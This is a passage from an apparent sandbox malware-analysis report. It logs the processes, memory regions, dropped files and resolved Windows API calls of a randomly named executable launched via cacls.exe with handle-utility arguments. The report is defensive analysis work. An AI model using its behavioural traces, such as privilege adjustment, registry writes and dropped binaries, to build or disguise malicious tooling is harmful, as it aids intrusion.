3 | |
| Set Environment String | name = FN, value = "msoeres.dll.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #175: wmiadap.exe
0
0
| Information | Value |
|---|---|
| ID | #175 |
| File Name | c:\windows\system32\wbem\wmiadap.exe |
| Command Line | wmiadap.exe /F /T /R |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:03, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:38 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb0 |
| Parent PID | 0x330 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
FC4
0x
D80
0x
E1C
0x
A28
0x
D28
0x
3C8
0x
200
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000655c440000 | 0x655c440000 | 0x655c45ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000655c440000 | 0x655c440000 | 0x655c44ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000655c450000 | 0x655c450000 | 0x655c456fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000655c460000 | 0x655c460000 | 0x655c473fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000655c480000 | 0x655c480000 | 0x655c4fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000655c500000 | 0x655c500000 | 0x655c503fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000655c510000 | 0x655c510000 | 0x655c510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000655c520000 | 0x655c520000 | 0x655c521fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x655c530000 | 0x655c5edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000655c5f0000 | 0x655c5f0000 | 0x655c5f6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000655c600000 | 0x655c600000 | 0x655c600fff | Private Memory | rw |
|
|
|
- |
| private_0x000000655c610000 | 0x655c610000 | 0x655c610fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000655c620000 | 0x655c620000 | 0x655c620fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000655c630000 | 0x655c630000 | 0x655c72ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000655c730000 | 0x655c730000 | 0x655c7affff | Private Memory | rw |
|
|
|
- |
| private_0x000000655c7b0000 | 0x655c7b0000 | 0x655c82ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000655c830000 | 0x655c830000 | 0x655c8effff | Private Memory | rw |
|
|
|
- |
| private_0x000000655c830000 | 0x655c830000 | 0x655c8affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000655c8b0000 | 0x655c8b0000 | 0x655c8b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000655c8e0000 | 0x655c8e0000 | 0x655c8effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000655c8f0000 | 0x655c8f0000 | 0x655ca77fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000655ca80000 | 0x655ca80000 | 0x655cc00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000655cc10000 | 0x655cc10000 | 0x655cccffff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x655ccd0000 | 0x655cda5fff | Memory Mapped File | r |
|
|
|
- |
| ole32.dll | 0x655ccd0000 | 0x655ce10fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0x655ccd0000 | 0x655d006fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000655d010000 | 0x655d010000 | 0x655d08ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000655d090000 | 0x655d090000 | 0x655d10ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000655d110000 | 0x655d110000 | 0x655d18ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff3b0000 | 0x7df5ff3b0000 | 0x7ff5ff3affff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6655ae000 | 0x7ff6655ae000 | 0x7ff6655affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6655b0000 | 0x7ff6655b0000 | 0x7ff6656affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6656b0000 | 0x7ff6656b0000 | 0x7ff6656d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6656d3000 | 0x7ff6656d3000 | 0x7ff6656d4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6656d5000 | 0x7ff6656d5000 | 0x7ff6656d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6656d7000 | 0x7ff6656d7000 | 0x7ff6656d8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6656d9000 | 0x7ff6656d9000 | 0x7ff6656dafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6656db000 | 0x7ff6656db000 | 0x7ff6656dcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6656dd000 | 0x7ff6656dd000 | 0x7ff6656defff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6656df000 | 0x7ff6656df000 | 0x7ff6656dffff | Private Memory | rw |
|
|
|
- |
| wmiadap.exe | 0x7ff6657b0000 | 0x7ff6657defff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ff8e0290000 | 0x7ff8e02a3fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ff8e02b0000 | 0x7ff8e03a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ff8e06b0000 | 0x7ff8e06c0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ff8e56f0000 | 0x7ff8e576efff | Memory Mapped File | rwx |
|
|
|
- |
| loadperf.dll | 0x7ff8e6e40000 | 0x7ff8e6e64fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x7ff8ee240000 | 0x7ff8ee247fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #178: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #178 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:06, Reason: Child Process |
| Unmonitor | End Time: 00:03:11, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xca8 |
| Parent PID | 0xb1c (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E74
0x
D38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00290000 | 0x002b9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00a90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x01e9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
